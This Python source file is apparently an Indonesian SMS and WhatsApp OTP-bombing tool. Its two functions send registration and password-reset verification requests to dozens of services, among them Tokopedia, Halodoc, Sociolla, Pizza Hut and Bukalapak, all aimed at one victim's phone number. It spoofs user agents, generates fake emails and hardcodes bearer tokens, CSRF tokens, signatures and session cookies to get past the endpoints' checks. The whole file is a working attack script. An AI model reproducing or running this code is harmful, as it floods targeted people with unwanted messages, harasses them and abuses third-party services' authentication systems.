import os,sys,time,json
import re,requests,base64
from time import sleep
from fake_useragent import UserAgent
from faker import Faker

def random_email():
    dummy = Faker()
    return dummy.email()
email = random_email()
User_Agent = UserAgent()
ua = User_Agent.chrome

def SMS(nomor):
    try:
        ktbs = requests.post("https://geni.kitabisa.com/wong/register/draft",data = json.dumps({"full_name":"Halodoc","username":"0"+nomor,"otp_type":"sms"}),headers = {'User-Agent': ua,'version': "3.4.0",'x-ktbs-time': "1717941888",'x-ktbs-api-version': "1.0.0",'x-ktbs-client-name': "kanvas",'x-ktbs-request-id': "ad24fd07-8650-4659-93e0-35ddb9a8273e",'x-ktbs-platform-name': "kanvas",'x-ktbs-client-version': "1.0.0",'x-ktbs-signature': "d7fd8f6d32999a0bbe5654c7e9654517fb85dd733bb3e5fcafbec86ba14cacba",}).text
        sayurbox = requests.post("https://www.sayurbox.com/graphql/v1",data = json.dumps([{"operationName": "generateOTP","variables": {"destinationType": "sms","identity": "+62"+nomor},"query": "mutation generateOTP($destinationType:String!$identity:String!){generateOTP(destinationType:$destinationType identity:$identity){id __typename}}"}]),headers = {'Content-Type': "application/json",'authorization': requests.get('https://www.sayurbox.com/auth/signup').cookies.get_dict()['token']}).text
        regjam = requests.post("https://gateway.jamtangan.com/query",data = json.dumps([{"operationName": "validateInputOtp","variables": {"input": {"input": "62"+nomor,"source": "signup"}},"query": "mutation validateInputOtp($input: validateInputOTPReq!) {\n  validateInputOtp(input: $input) {\n    meta {\n      code\n      error\n      message\n    }\n    result {\n      type\n      input\n      listMessage {\n        message\n      }\n      attempt\n      maxAttempt\n      nextTimeAttempt\n      sendVia\n    }\n  }\n}\n"}]),headers = {'User-Agent': ua,'authorization': "Bearer "+requests.get("https://jamtangan.com",headers={"User-Agent":ua}).cookies.get_dict()["session_access_token"]}).text
        jam = requests.post("https://gateway.jamtangan.com/query",data = json.dumps([{"operationName": "sendOtp","variables": {"input": {"input": "62"+nomor,"source": "signup","sendVia": "sms"}},"query": "mutation sendOtp($input: sendOtpReq!) {\n  sendOtp(input: $input) {\n    meta {\n      code\n      error\n      message\n    }\n    result {\n      input\n      attempt\n      nextTimeAttempt\n      maxAttempt\n      expiry\n      sent\n    }\n  }\n}\n"}]),headers = {'User-Agent': ua,'authorization': "Bearer "+requests.get("https://jamtangan.com",headers={"User-Agent":ua}).cookies.get_dict() ["session_access_token"],}).text
        tiket = requests.post("https://account.bliblitiket.com/gateway/gks-unm-go-be/api/v1/otp/generate",data = "{\"action\":\"REGISTER_OTP\",\"channel\":\"SMS\",\"recipient\":\"+62"+nomor+"\",\"recaptchaToken\":\"\"}",headers = {'User-Agent': ua,}).text
        mapclub = requests.post("https://beryllium.mapclub.com/api/member/registration/sms/otp?channel=SMS",data = json.dumps({"account": nomor}),headers = {'User-Agent': ua,"Content-Type": "application/json",'Client-Platform': "WEB",'Authorization': "Bearer "+json.loads(requests.get("https://beryllium.mapclub.com/api/auth/token/refresh",headers={"Authorization": "Bearer eyJhbGciOiJIUzUxMiJ9.eyJndWVzdENvZGUiOiI5ZTI3ZWM4MC02NzhlLTRkY2MtYTJjYS0xYzkyZTczN2FmMjQiLCJleHBpcmVkIjoxNzEwMzgyNjUyNDczLCJleHBpcmUiOjM2MDAsImV4cCI6MTcxMDM4MjY1MiwiaWF0IjoxNzEwMzc5MDUyLCJwbGF0Zm9ybSI6IldFQiJ9.0Q_Hw_6ZtVTlrEE7mDL6blf6o00UaV5btfQdnPCMjy1PzuRaAgLnc5ImLKzHdsbWSDg97hogMTxG5F8xrfm4Sw","User-Agent": ua,}).text)['data'][0]['accessToken']}).text
        mapx = requests.post("https://beryllium.mapclub.com/api/member/password/reset/otp?channel=SMS",data = json.dumps({"mobile": nomor}),headers = {'User-Agent': ua,'Content-Type': "application/json",'Client-Platform': "WEB",'Authorization': "Bearer eyJhbGciOiJIUzUxMiJ9.eyJndWVzdENvZGUiOiIyOTU0ODYxNi05YjM5LTRiMjEtODNlZS1jZDg3YjdjNWQ0ZTkiLCJleHBpcmVkIjoxNzI0NDMxOTE1MjY0LCJleHBpcmUiOjM2MDAsImV4cCI6MTcyNDQzMTkxNSwiaWF0IjoxNzI0NDI4MzE1LCJwbGF0Zm9ybSI6IldFQiJ9.hdptMxQ2-c_diJu8XYGPnRkxLAvS8GDomqhozg-aB7vo2ASo5pH__rkbutZVdxD2haL9xXnDJLDgp44aaL1ZOQ",}).text
        Sociolla = requests.post("https://soco-api.sociolla.com/auth/otp/code", data=json.dumps({"mode": "sms","phone_no": nomor,"entity": "phone_no"}), headers = {'Content-Type': "application/json",'authorization': "Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXIiOnsiX2lkIjoiNjYwOTcyMDU2NmIxNDI1YjM2ZWM1NDAyIiwiaWQiOjYyNTQxNDAsImVtYWlsIjoiZW1haWxrYW11QGdtYWlsLmNvbSIsInJvbGUiOiJjb21tdW5pdHkiLCJsb2NhbGUiOiJpZCIsImlzX290cF9hZG1pbiI6ZmFsc2UsInNvY2lvbGxhIjp7ImlkIjoiNjI1NDE0MCIsInRva2VuIjoiZXlKaGJHY2lPaUpJVXpVeE1pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0ltbGtJam9pTmpJMU5ERTBNQ0lzSW5WelpYSWlPbnNpYVdRaU9pSTJNalUwTVRRd0luMTlMQ0pwWVhRaU9qRTNNVEU0T1RVd05EWXNJbTVpWmlJNk1UY3hNVGc1TlRBMU5pd2laWGh3SWpveE56UXpORE14TURRMkxDSnBjM01pT2lKemMyOHVjMjlqYnk1cFpDSXNJbXAwYVNJNklqVmlZV00xTkRkaU16aGxNams0TWpnMll6RTFObUpoT1RCa05EVmxNbUkzSW4wLmpkQUxNQVZSUG9fQTY0M2k1RHRaWXdNUTlnY3RfLTluUGJKd0FuU3A2Ymh0TWVGSXllRzcwbFJ6V1I3dWtYano1WjFkbGU4S2lRU0VxSzYzNGZlVThRIn19fSwiaWF0IjoxNzExODk1MDQ2LCJuYmYiOjE3MTE4OTUwNTYsImV4cCI6MTc0MzQzMTA0NiwiaXNzIjoic3NvLnNvY28uaWQiLCJqdGkiOiI1YmFjNTQ3YjM4ZTI5ODI4NmMxNTZiYTkwZDQ1ZTJiNyJ9.YprEcmkksIq-XhJA-00yfh7-JSLC01-k96EgKoHxIf242VH7WDGKi1ojYOX7nmNfU98Hp3vg2BN_2ZM0Jb64TQ",}).text
        ##Bukalapak = requests.post("https://api.bukalapak.com/agents?access_token="+re.search(r'{"access_token":"(.*?)",', requests.post("https://mitra.bukalapak.com/oauth/token",data = json.dumps({"client_id": "CFmaVcqBtX4DNHfxBGYbAtEzlXYCWIqk7hQqFPcLmcY","grant_type": "client_credentials"}),headers = {'Content-Type': "application/json"}).text).group(1),data = json.dumps({"phone": "0"+nomor}),headers = {'bukalapak-identity': "a794fc5a0d14ef92d26a20c6f5a97847",'bukalapak-otp-method': "sms"}).text
        xtk = requests.get("https://accounts.tokopedia.com/otp/c/page?otp_type=116&msisdn=0"+nomor+"&ld=https://accounts.tokopedia.com/register?type=phone&phone={}&status=eyJrIjp0cnVlLCJtIjp0cnVlLCJzIjpmYWxzZSwiYm90IjpmYWxzZSwiZ2MiOmZhbHNlfQ==",headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",}).text
        Tokopedia = requests.post("https://accounts.tokopedia.com/otp/c/ajax/request-sms",data = "tk="+re.search(r"<input id=\"Token\" value=\"(.*?)\" type=\"hidden\">", xtk).group(1)+"&otp_type=116&msisdn="+re.search(r"<input id=\"MSISDN\" value=\"(.*?)\" type=\"hidden\">", xtk).group(1)+"&email=&original_param=&user_id=&signature=&number_otp_digit=6&fingerprint_id=&fingerprint_data=&m_enc=undefined&e_enc=undefined",headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",'content-type': "application/x-www-form-urlencoded; charset=UTF-8",}).text
        ##halodoc=requests.post("https://magneto.api.halodoc.com/api/v1/users/authentication/otp/requests",data = json.dumps({"phone_number": "+62"+nomor,"channel": "sms","otp_resent": False}),headers = {'Content-Type': "application/json",'x-xsrf-token': "51DA35393E7B26ACD54880107965ABBE635E7B189C505DEA17A5F5A2BE08E10B1BCE46656B5A2057DD9A11925C8218797FB8",'origin': "https://www.Halodoc.com",'Cookie': "XSRF-TOKEN=51DA35393E7B26ACD54880107965ABBE635E7B189C505DEA17A5F5A2BE08E10B1BCE46656B5A2057DD9A11925C8218797FB8"}).text
        Dekoruma = requests.post("https://auth.dekoruma.com/api/v1/register/request-otp-phone-number/?format=json",headers={"save-data":"on","user-agent":ua,"content-type":"application/json"},data=json.dumps({"phoneNumber":"+62"+nomor,"platform":"sms"})).text
        ##desty = requests.post("https://pulibic-gateway.desty.app/platform/user/catpcha/send",data = json.dumps({"inputValue": nomor,"loginType": "Phone","googleCaptcha": "03AFcWeA5XL6Y9baBTjFtsB7LQpz9zBAW_NJr9mmniMh3q3Rz1tSmAERKFiyAnxhOk2xOZzW1ANC6pLrMlopxFmFunx5IYjZq5DP1hg9Xci1LJ5FgnqCwaYNCEjAVy-wAGtPQtSPjggTKScwYHlCrl23rL1uzlBP-zhfr_AqEdE-qjQh3YSKCk9ZBaGnIhjxygpR86wkgk9sgAgZinxMFOnWi3lv_ofN_ArA7FRiTWQMPeXpw-mHEFJvAyeBp8OHVPkkmZnEzyPeMx29fR627d7HOJ0yQRxh5fi9X6EggQnKtsmYfnuA9IBOHVcRBPFBmVYag-ryTo3Ts7FYTJFBtdMkC_Od3AgidCEOkJHA6NaJSL-Xg_oT7WtA-XKk2mjbd97XFkwKMpM-MT3WdXyWBbFJm3QVhCfSTP1lRxueWIFy2-ipV2vle0liUmJqSJYNWXxcH0THP3uxJ0mUUlxh-ciS2F69hR8X3Fg9JS03-iddd-bTcFNhLjZNUGgS1PU7MAMMcNfL3TONxcrHM61uPIHY5cir74AQoDBgeFYOYOLXTtONvPnBf7sCgeP8KebD-1QkFHMvs_pJre7hPmyuVJCyesNXA5lRflvfkYOaiUuekKlhYB1Is7pxqXURTeIiQ5i8ZI4AyIPn9fKkazj2zKm1lXdRGRHYrPnfWvQbKMjMxrKRIytWY3X70rxwheGZg6VJAharVRCsWkv1nTWrj463oMbrblndrWsTXQ74nZEooZOImJoKJZQEqrL8HqpxA-O_K4NJlmy0SU5bNELYwM2BKZCEdmzUGv-5G5ABGXRunEja4MvkwaZSjk27u1ert9FXRfzFRFBJeLte33yjt6AsNRDlZI7_mlSQfgUtNQKgPraaQUFSn_QiLsdfYz891bZBWHX-2zFk6eOCdqLVcglaAeeg0usZyjITSYz5sOLiccRuSBhACw2v0RuRcPjjqlF8JN0T7Zco3X0g1HJ6rcRvdweh9PY5bFainxb27d2iM93Kf_PBstZLGg5LRSQNHLtk3XRXWjUSV_cQBMW1kKZD7WVXdmKNaadpvKDk5wZdG46bEyGtYc0aj4aM4cBjI6hRq0M3BrfG6XqhuFmi2hNfYhhB8Dngcxyx8IGItaN-34UDVYgS884XzV9n9QCdenk8wWjrMJU4K7NPhPNPQlzUW-4iepkqadFpTpzVlCtHQ10pquLgejp8nczU6bbxCfp6vXDRg18TuinqSIMneshadaissLQIs17xYVEFAvCg06jg42GKyiJq4aOFMpeCxJ2sW0-PUiVyYgeNEM0JE-15534HRdHbWHTOsAgQyADfnI4pYytCDi5GiNOcmURXPvn2dQHx3E57GbjjEM6r5S3dXY7u4AF5ysSWsg1ps4By2YZPl2p1lkJpOQx25-QCcLcRMhKzdeh1GFbZNpHd4R_mJoy9qfLc7zN7RMf6zEcbMufk1Y1RNUmSyyC93KTnAn5Sf9-UbW9ncoxzCGiHqHZO_oSRTylsfwe3aPe9F--UOtDaJAOTsncknMEmGKGmAkeopG2fNy2xuiUhkmWLQPqHUNyVHBIge9KTOfW5TMOkMwQ9RxOOMQm_TCdwckoXHNtilv6-ZfiTMvqGIGMnWF3g5maQpLkQk4OipJSbbTql2QYtX-HOoN7Crl46g17L9EnI0YgF7IedAlSc6smbH6Se8MII8Lre4I8xCWI_-z0UjcWls0KLZDwXX_zl491DuxJcyvbjOlNtI4bcGCSpOEoMC3WaC2bRxFGQ","address": "+62"+nomor,"expire": True,"language": "id","source": "Page","sendType": "SMS","app": "Page","clientType": 1,"isSub": False,"situation": "REGISTER"}),headers = {'Content-Type': "application/json",'local-agent': "DestyMenuSeller",}).text
        kredito = requests.post("https://app-api.kredito.id/client/v1/common/verify-code/send",'{"event":"default_verification","mobilePhone":"%s","sender":"jatissms"}'%(nomor),headers={"LPR-TIMESTAMP":"1603281035821","LPR-BRAND":"Kredito","LPR-PLATFORM":"android","User-Agent":"okhttp/3.11.0 Dalvik/2.1.0 (Linux; U; Android 9; vivo 1902 Build/PPR1.180610.011) AppName/Kredito/v2.6.3 AppChannel/googleplay PlatformType/android","Authorization":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOi0xNjAzMjgxMDE3MjAzLCJ1dHlwZSI6ImFub24iLCJleHAiOjE2MDMyODQ2MTd9._HUnW7FQmMiDWvSejS0MBqMq95l2rk_6PuxDeXY5Oks","LPR-SIGNATURE":"e15dbea8602409df32a2ed5a123dc244","Content-Type":"application/json; charset=UTF-8",}).text
        kreditpintar = requests.post("https://h.kreditpintar.com/api/auth/send-code?channel=OFFICIAL2021&lang=id", headers = {"x-user-agent": "Pintar-ID-Cash (WebAndroid;;;id) uuid/51934617-5d9c-4e84-a916-c617b316eeae version/0.1.0","x-app-version": "APPVERSION_NAME(9999)","x-adv-uuid": "51934617-5d9c-4e84-a916-c617b316eeae","User-Agent": ua,"Content-Type": "application/json"}, json={"mobileNumber": nomor,"type": "SMS"}).text
        ##rupiahcepat = json.loads(requests.post('https://apiservice.rupiahcepatweb.com/webapi/v1/request_login_register_auth_code',headers={"content-type": "application/x-www-form-urlencoded; charset=UTF-8","user-agent": ua},data={"data":json.dumps({"mobile":"0"+nomor,"noise":"1583590641573155574","request_time":"158359064157312","access_token":"11111"})}).text)
        cicil = requests.post("https://apis.cicil.biz.id:8443/kancil/user/guest/apis/v2/user/generate-otp",data = json.dumps({"Recipient": nomor,"Purpose": 3,"userType": "borrower"}),headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.58 Mobile Safari/537.36",'Content-Type': "application/json",}).text
        datax = base64.b64encode(('0' + nomor + "-M0M0T0RK3Y").encode('utf-8')).decode('utf-8')
        momotor = requests.post("https://apiprod.momotor.id/momotor-api/users/motor/send-otp",data = json.dumps({"to": datax}),headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.58 Mobile Safari/537.36",'Accept': "application/json, text/plain, */*",'Content-Type': "application/json",}).text
        carmudi = requests.post("https://www.carmudi.co.id/api/profile/tac-code-request",data = json.dumps({"mobileNumber": "+62"+nomor}),headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.58 Mobile Safari/537.36",'Content-Type': "application/json",'x-csrf-token': "om4FV4cketGFe8zEySp5dkFljT_I07kPCAdR8BgoPBKVW3c-72M0v9ItmZ67HzEgLDP_Ua689FdXSgGYW1tLdQ==",'Cookie': "tml_i=4e21c317-3877-4619-9859-7b1707586a51; _csrf=75rihGNnWVUZr5HVmVrnfoMX_MPhCswg; _gid=GA1.3.143794359.1729819645; tml_s=a39b7c6c-0b10-4c54-99e9-4765b0d4b7cf; tml_t=be9d4851-11c6-4e6f-8865-79701dbfdc79; _fbp=fb.2.1729819648282.930429503451405709; _clck=1e4isye%7C2%7Cfqb%7C0%7C1759; G_ENABLED_IDPS=google; __gads=ID=5794af2f4cbd703c:T=1729819652:RT=1729819652:S=ALNI_Mbe-mOP9cDp7BuxnKxhjlp2zsLHyA; __gpi=UID=00000f52943ad888:T=1729819652:RT=1729819652:S=ALNI_MZ502M1fACXM4DCajAyQS4SRDiszg; __eoi=ID=c817ecbb7848801e:T=1729819652:RT=1729819652:S=AA-AfjalXSxzqXVXjFM4x2Texe_a; _cc_id=f9d0ab244e4d371a9c961162cb489fe3; panoramaId_expiry=1730424453773; panoramaId=f22a39ee0baded01215689a5c61016d5393854f63e172ff0e12484e99e6878e6; panoramaIdType=panoIndiv; cto_bundle=D3WPsV9iMDZSYjRwUyUyQkpkVGNud3o5alg5ZVZLR2M0blg1NG9oY2NSQ1FBR2s0eUF0STBhc29ZRCUyQlU4JTJGNjNvdzFQQTlkUGUlMkZlcTVwclRtWU5US1QyYjl3RXBKc1hWZzFVb0VkcVBTRWhYclljMndvTWZvNVRWeWY0SnBnWDVRRXZrWnVvRVNidHRVMTRKamR0emJBZERwNGpFQSUzRCUzRA; FCNEC=%5B%5B%22AKsRol9uAfq6UMarxatc-_aQIhmM78CI8DD_qo0UVtQen7ZkhPxpjzDOxfiCdh8CEdEjABR-R6VCKcEdxalI8s8LuIqsd7JUdTLzmwI10dupjeFbtqNzg5mlUybBJXMH8Oq89YnKIzISerl_zd5m7pcg0SSWTnsC-w%3D%3D%22%5D%5D; visitorTrackingId=4450237c-52dc-4bb1-95e2-70e8242ce9e3; visitorSessionId=6525760a-2f4b-4f3b-a110-1fa47708c652; UserToken=GmD%2FZFNTD0G5e80N8yMlLHVZHGu66oIxNcOZx3slNZzB5iRBXdYfxQ%3D%3D; ProfileType=434070001; isUserChecked=1; visitorGUID=d5035c77-6988-4f76-9c1b-cf8655c4298e; user-locale=id; _dc_gtm_UA-48959041-5=1; _ga=GA1.1.1645594586.1729819645; _ga_MHHDH581NS=GS1.3.1729819740.1.1.1729820477.60.0.0; _clsk=16i9ba4%7C1729820485131%7C1%7C1%7Cs.clarity.ms%2Fcollect; _ga_NWFNZN83H2=GS1.1.6525760a-2f4b-4f3b-a110-1fa47708c652.1.1.1729820490.0.0.0"}).text
        return "OTP SMS berhasil dikirim ke 0{}".format(nomor)
    except Exception as e:
        return "Error: {}".format(e)

def WA(nomor):
    try:
        ktbs = requests.post("https://geni.kitabisa.com/wong/register/draft",data = json.dumps({"full_name":"halodoc","username":"0"+nomor,"otp_type":"whatsapp"}),headers = {'User-Agent': ua,'Content-Type': "application/x-www-form-urlencoded",'x-ktbs-time': "1725195549",'x-ktbs-api-version': "1.0.0",'x-ktbs-client-name': "kanvas",'x-ktbs-request-id': "a51f38d3-303d-4f56-86af-29156870ff4e",'x-ktbs-platform-name': "kanvas",'x-ktbs-client-version': "1.0.0",'x-ktbs-signature': "274f2f877fa14f177074649c5bb507d96476eac2f4474c4c3399ceb93f95fe6a",'version': "3.4.0",}).text
        ##sayurbox = requests.post("https://www.sayurbox.com/graphql/v1",data = json.dumps([{"operationName": "generateOTP","variables": {"destinationType": "whatsapp","identity": "+62"+nomor},"query": "mutation generateOTP($destinationType:String!$identity:String!){generateOTP(destinationType:$destinationType identity:$identity){id __typename}}"}]),headers = {'Content-Type': "application/json",'authorization': requests.get('https://www.sayurbox.com/auth/signup').cookies.get_dict()['token']}).text
        ##bibit = requests.post("https://api.bibit.id/auth/register/phone",headers={'content-type':'application/json','user-agent':ua,},data=json.dumps({"code":"62","phone":nomor,"via":"whatsapp","recaptcha_token":"","recaptcha_type":"v3"})).text
        ##regjam = requests.post("https://gateway.jamtangan.com/query",data = json.dumps([{"operationName": "validateInputOtp","variables": {"input": {"input": "62"+nomor,"source": "signup"}},"query": "mutation validateInputOtp($input: validateInputOTPReq!) {\n  validateInputOtp(input: $input) {\n    meta {\n      code\n      error\n      message\n    }\n    result {\n      type\n      input\n      listMessage {\n        message\n      }\n      attempt\n      maxAttempt\n      nextTimeAttempt\n      sendVia\n    }\n  }\n}\n"}]),headers = {'User-Agent': ua,'authorization': "Bearer "+requests.get("https://jamtangan.com",headers={"User-Agent":ua}).cookies.get_dict()["session_access_token"]}).text
        ##jam = requests.post("https://gateway.jamtangan.com/query",data = json.dumps([{"operationName": "sendOtp","variables": {"input": {"input": "62"+nomor,"source": "signup","sendVia": "whatsapp"}},"query": "mutation sendOtp($input: sendOtpReq!) {\n  sendOtp(input: $input) {\n    meta {\n      code\n      error\n      message\n    }\n    result {\n      input\n      attempt\n      nextTimeAttempt\n      maxAttempt\n      expiry\n      sent\n    }\n  }\n}\n"}]),headers = {'User-Agent': ua,'authorization': "Bearer "+requests.get("https://jamtangan.com",headers={"User-Agent":ua}).cookies.get_dict() ["session_access_token"],}).text
        tiket = requests.post("https://account.bliblitiket.com/gateway/gks-unm-go-be/api/v1/otp/generate",data = "{\"action\":\"REGISTER_OTP\",\"channel\":\"WHATS_APP\",\"recipient\":\"+62"+nomor+"\",\"recaptchaToken\":\"\"}",headers = {'User-Agent': ua,}).text
        foa = requests.post("https://www.foreignadmits.com/api/users",data = json.dumps({"mobile": "+62"+nomor,"type": "student","roleId": "student","roleName": "student","usersAvailOtp": True}),headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/125.0.6422.165 Mobile Safari/537.36",'Content-Type': "application/json",}).text
        yesdok = requests.post("https://www.yesdok.com/api/4.0/patient/register",data = json.dumps({"ReferralCode": "","Firstname": "Halo","Lastname": "Hai","Email": email,"Phone": "+62"+nomor,"AcceptTnc": False,"Type": "NORMAL"}),headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",'Content-Type': "application/json",}).text
        yesx = requests.get("https://www.yesdok.com/api/4.0/patient/sign/in?Email=0"+nomor,headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.71 Mobile Safari/537.36",}).text
        keypiz = json.loads(requests.post("https://api-prod.pizzahut.co.id/customer/v1/customer/register",data = json.dumps({"email": "eamailkamu51@gmail.com","first_name": "Halo","gender": 1,"last_name": "Doc","password": "CelekAyam1@","phone": nomor,"birthday": "2007-06-15","keep_otp": 1}),headers = {'x-platform': "WEBMOBILE",'x-channel': "2",'x-client-id': "b39773b0-435b-4f41-80e9-163eef20e0ab",'x-lang': "en",}).text)['data']['key']
        pizzahut = requests.post("https://api-prod.pizzahut.co.id/customer/v1/customer/send-otp",data = json.dumps({"type": 1,"key": keypiz}),headers = {'x-platform': "WEBMOBILE",'x-channel': "2",'x-client-id': "b39773b0-435b-4f41-80e9-163eef20e0ab",'x-lang': "en",}).text
        dusdusan = requests.post("https://apigateway.dusdusan.com/otpRegistrationSend",data = json.dumps({"fullname":"Halo","phone":"0"+nomor,"ts":85330}),headers = {'User-Agent': "Mozilla/5.0 (Linux; Android 11; V2026 Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",'Content-Type': "application/x-www-form-urlencoded",'ddc-request': "Wr11ApVxX8d72ohL8y6Kw0V8uSb0lmehEoe1DgTGvwk=",}).text
        mapclub = requests.post("https://beryllium.mapclub.com/api/member/registration/sms/otp?channel=WHATSAPP",data = json.dumps({"account": nomor}),headers = {'User-Agent': ua,"Content-Type": "application/json",'Client-Platform': "WEB",'Authorization': "Bearer "+json.loads(requests.get("https://beryllium.mapclub.com/api/auth/token/refresh",headers={"Authorization": "Bearer eyJhbGciOiJIUzUxMiJ9.eyJndWVzdENvZGUiOiI5ZTI3ZWM4MC02NzhlLTRkY2MtYTJjYS0xYzkyZTczN2FmMjQiLCJleHBpcmVkIjoxNzEwMzgyNjUyNDczLCJleHBpcmUiOjM2MDAsImV4cCI6MTcxMDM4MjY1MiwiaWF0IjoxNzEwMzc5MDUyLCJwbGF0Zm9ybSI6IldFQiJ9.0Q_Hw_6ZtVTlrEE7mDL6blf6o00UaV5btfQdnPCMjy1PzuRaAgLnc5ImLKzHdsbWSDg97hogMTxG5F8xrfm4Sw","User-Agent": ua,}).text)['data'][0]['accessToken']}).text
        Sociolla = requests.post("https://soco-api.sociolla.com/auth/otp/code", data=json.dumps({"mode": "whatsapp","phone_no": nomor,"entity": "phone_no"}), headers = {'Content-Type': "application/json",'authorization': "Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXIiOnsiX2lkIjoiNjYwOTcyMDU2NmIxNDI1YjM2ZWM1NDAyIiwiaWQiOjYyNTQxNDAsImVtYWlsIjoiZW1haWxrYW11QGdtYWlsLmNvbSIsInJvbGUiOiJjb21tdW5pdHkiLCJsb2NhbGUiOiJpZCIsImlzX290cF9hZG1pbiI6ZmFsc2UsInNvY2lvbGxhIjp7ImlkIjoiNjI1NDE0MCIsInRva2VuIjoiZXlKaGJHY2lPaUpJVXpVeE1pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0ltbGtJam9pTmpJMU5ERTBNQ0lzSW5WelpYSWlPbnNpYVdRaU9pSTJNalUwTVRRd0luMTlMQ0pwWVhRaU9qRTNNVEU0T1RVd05EWXNJbTVpWmlJNk1UY3hNVGc1TlRBMU5pd2laWGh3SWpveE56UXpORE14TURRMkxDSnBjM01pT2lKemMyOHVjMjlqYnk1cFpDSXNJbXAwYVNJNklqVmlZV00xTkRkaU16aGxNams0TWpnMll6RTFObUpoT1RCa05EVmxNbUkzSW4wLmpkQUxNQVZSUG9fQTY0M2k1RHRaWXdNUTlnY3RfLTluUGJKd0FuU3A2Ymh0TWVGSXllRzcwbFJ6V1I3dWtYano1WjFkbGU4S2lRU0VxSzYzNGZlVThRIn19fSwiaWF0IjoxNzExODk1MDQ2LCJuYmYiOjE3MTE4OTUwNTYsImV4cCI6MTc0MzQzMTA0NiwiaXNzIjoic3NvLnNvY28uaWQiLCJqdGkiOiI1YmFjNTQ3YjM4ZTI5ODI4NmMxNTZiYTkwZDQ1ZTJiNyJ9.YprEcmkksIq-XhJA-00yfh7-JSLC01-k96EgKoHxIf242VH7WDGKi1ojYOX7nmNfU98Hp3vg2BN_2ZM0Jb64TQ",}).text
        Bukalapak = requests.post("https://api.bukalapak.com/agents?access_token="+re.search(r'{"access_token":"(.*?)",', requests.post("https://mitra.bukalapak.com/oauth/token",data = json.dumps({"client_id": "CFmaVcqBtX4DNHfxBGYbAtEzlXYCWIqk7hQqFPcLmcY","grant_type": "client_credentials"}),headers = {'Content-Type': "application/json"}).text).group(1),data = json.dumps({"phone": "0"+nomor}),headers = {'bukalapak-identity': "a794fc5a0d14ef92d26a20c6f5a97847",'bukalapak-otp-method': "whatsapp"}).text
        ##xtk = requests.get("https://accounts.tokopedia.com/otp/c/page?otp_type=116&msisdn=0"+nomor+"&ld=https://accounts.tokopedia.com/register?type=phone&phone={}&status=eyJrIjp0cnVlLCJtIjp0cnVlLCJzIjpmYWxzZSwiYm90IjpmYWxzZSwiZ2MiOmZhbHNlfQ==",headers = {'User-Agent': ua}).text
        ##Tokopedia = requests.post("https://accounts.tokopedia.com/otp/c/ajax/request-wa",data = "tk="+re.search(r"<input id=\"Token\" value=\"(.*?)\" type=\"hidden\">", xtk).group(1)+"&otp_type=116&msisdn="+re.search(r"<input id=\"MSISDN\" value=\"(.*?)\" type=\"hidden\">", xtk).group(1)+"&email=&original_param=&user_id=&signature=&number_otp_digit=6&fingerprint_id=&fingerprint_data=&m_enc=undefined&e_enc=undefined",headers = {'User-Agent': ua,'content-type': "application/x-www-form-urlencoded; charset=UTF-8",}).text
        halodoc = requests.post("https://magneto.api.halodoc.com/api/v1/users/authentication/otp/requests", headers = {"User-Agent": ua,"Origin": "https://www.halodoc.com","X-XSRF-TOKEN": "D12D611B234C4FAE3392DFAB88777FFFEFCA75A57B5B7434B7CA9170D05FAF618BC66315885DAA261B5C88FD3A0638955A80","Content-Type": "application/json","Cookie": 'XSRF-TOKEN=D12D611B234C4FAE3392DFAB88777FFFEFCA75A57B5B7434B7CA9170D05FAF618BC66315885DAA261B5C88FD3A0638955A80'}, data=json.dumps({"phone_number": "+62"+nomor,"channel": "whatsapp","otp_resent": False})).text
        ##sampingan=requests.post("https://auth.sampingan.co/v1/otp",headers={"Host":"auth.sampingan.co","domain-name":"auth-svc","app-auth":"Skip","content-type":"application/json; charset=UTF-8","user-agent":"okhttp/4.9.1","accept":"application/vnd.full+json","accept":"application/json","content-type":"application/vnd.full+json","content-type":"application/json","app-version":"2.1.2","app-platform":"Android"},data=json.dumps({"channel":"WA","country_code":"+62","phone_number":nomor})).text
        ##pintarnya=requests.post("https://api.pintarnya.com/api/pk/auth/register/mobile",headers={'authorization':'Bearer undefined','user-agent':ua,'content-type':'application/json','platform':'web-kerja'},data=json.dumps({"mobile":"+62"+nomor})).text
        return "OTP WA berhasil dikirim ke 0{}".format(nomor)
    except Exception as e:
        return "Error: {}".format(e)
